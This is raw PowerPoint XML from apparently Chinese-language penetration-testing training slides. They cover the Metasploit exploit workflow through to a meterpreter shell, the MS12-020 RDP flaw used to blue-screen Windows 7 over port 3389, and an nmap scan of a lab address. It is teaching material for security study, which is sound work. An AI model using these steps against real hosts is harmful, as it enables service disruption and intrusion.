            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>防火墙。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>现在是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>系统自带的防火墙工具。它不仅可以扫描系统，还可以对系统进行实时监控。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="384312" y="4160975"/>
            <a:ext cx="10972800" cy="107457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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>插件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="582339" y="5235551"/>
            <a:ext cx="10576747" cy="34512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itchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>        插件能够扩充框架的功能，或者封装已有功能构成高级功能的组件。插件可以用于集成现有的一些外部安全工具，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>漏洞扫描器等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33485796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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454459BE-CA20-5146-F72D-48029B3F8370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{584347F6-8A79-669A-A055-B3B48EB17AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="216569" y="1329760"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>渗透攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17413" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477A864A-1C59-FC27-5E77-9C3E67A178C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439006" y="2047311"/>
            <a:ext cx="10147300" cy="129805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50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>基本流程： 确定了存在的漏洞之后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>针对该漏洞的渗透测试模块， 使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>加载，并设置适合的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>show</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>显示需要配置的参数，并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>参数，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit/run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>执行，等待</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，渗透测试成功后，进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>模块实施后渗透测试。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>不同的攻击模块使用的步骤可能不同，需要用户灵活使用。但是，基本思路都一样。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>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221A8A6-D8F7-0F45-7844-B8D034CB0199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967693" y="2261197"/>
            <a:ext cx="9961564" cy="2242858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>         ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程桌面默认端口（3389）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统，Windows在处理某些RDP报文时Terminal Server 存在错误，可被利用造成服务停止响应（蓝屏）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C61CEEA-24A7-FFFE-C0A2-096578A7BC0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270070" y="1153617"/>
            <a:ext cx="11176664" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms12-020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A395663F-8078-7EF5-659A-2C7F50B50FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="967693" y="4830217"/>
            <a:ext cx="9847452" cy="1134862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        首先开启一下远程桌面，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ms12-020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要是针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口进行攻击，造成目标主机蓝屏</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28472406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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403B9A06-1BA8-1C28-05B4-7549F39B8930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF7D158-FA15-49AD-EC5B-52155B40A7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282265" y="1573076"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>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82668DE2-0164-D10B-6AC1-747D327528BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596799" y="1831635"/>
            <a:ext cx="10193337" cy="1113766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息收集：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>搜索活跃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和端口等：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 192.168.77.146</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞扫描：启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
